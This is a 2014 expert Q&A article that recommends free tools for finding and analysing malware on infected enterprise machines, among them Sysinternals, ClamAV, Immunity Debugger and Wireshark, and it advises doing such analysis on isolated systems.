Evaluate Weigh the pros and cons of technologies, products and projects you are considering.

What are the best antimalware tools for enterprise use?

Antimalware is a critical enterprise defense. Threats expert Nick Lewis discusses the best free antimalware tools to use in your organization.

I recently watched Keith Barker's demonstration on how to detect malware with different features of the free REMnux...

tool. Do you have any other free antimalware tools you'd suggest using to find malware on infected machines?

One of the best places to find free information security tools is SecTools.org's Top 125 Security Tools list, which rates both antimalware tools and rootkit detectors. It's periodically updated based on feedback from the information security community. SANS also has a short primer on malware analysis that includes additional tools. However, note that many of these tools require significant knowledge about the systems under investigation, and it may be best to use these tools in a lab setting before doing so in the field.

I have found that some of the most useful tools for beginners conducting malware analysis are the Windows Sysinternals tools. Note that security teams should always analyze malware on a test/isolated system because it is likely that the system will become infected. Organizations could conduct these tests in a virtual machine, but some advanced malware is able to detect a VM and will then behave differently. You can use the filemon tool to monitor what files are accessed by the malware, or regmon tool to monitor access to the registry. By monitoring file and registry access, you can get a better idea of the activities occurring on your systems. You could then use process explorer to take a more in-depth look at the running processes from the malware.   

There are two basic types of tools that can be used to find malware on an infected machine: one set of tools will look for known malicious signatures or behavior while the other will be for an advanced user to investigate in-depth to identify advanced malware on an infected machine. Signature- or behavior-based tools are often the commercial tools from McAfee, Symantec, etc. or open source tools such as ClamAV. Many times the advanced tools will be highly customizable, or feature a general toolkit that may take significant effort to use, such as Microsoft system internal, or Sysinternals, tools.

There are other tools available to analyze potentially malicious files that can help reverse engineer details about a file used in an attack; Immunity Debugger can be used to analyze an executable or Wireshark can help enterprises analyze network traffic from the malware. There are also tools that can analyze PDF or Word documents to identify URLs or hosts used on the Internet. These tools can also identify if there is embedded Javascript or other potentially malicious code in the file, which can be critical to identifying so other security controls can be put in place or updated.

Ask the Expert!
Want to ask Nick Lewis a question about enterprise threats? Submit your question now via email! (All questions are anonymous.)

This was last published in October 2014

Dig Deeper on Malware, virus, Trojan and spyware protection and removal

Have a question for an expert?

Please add a title for your question

Get answers from a TechTarget expert on whatever's puzzling you.

You will be able to add details on the next page.

Start the conversation

Send me notifications when other members comment.

Please create a username to comment.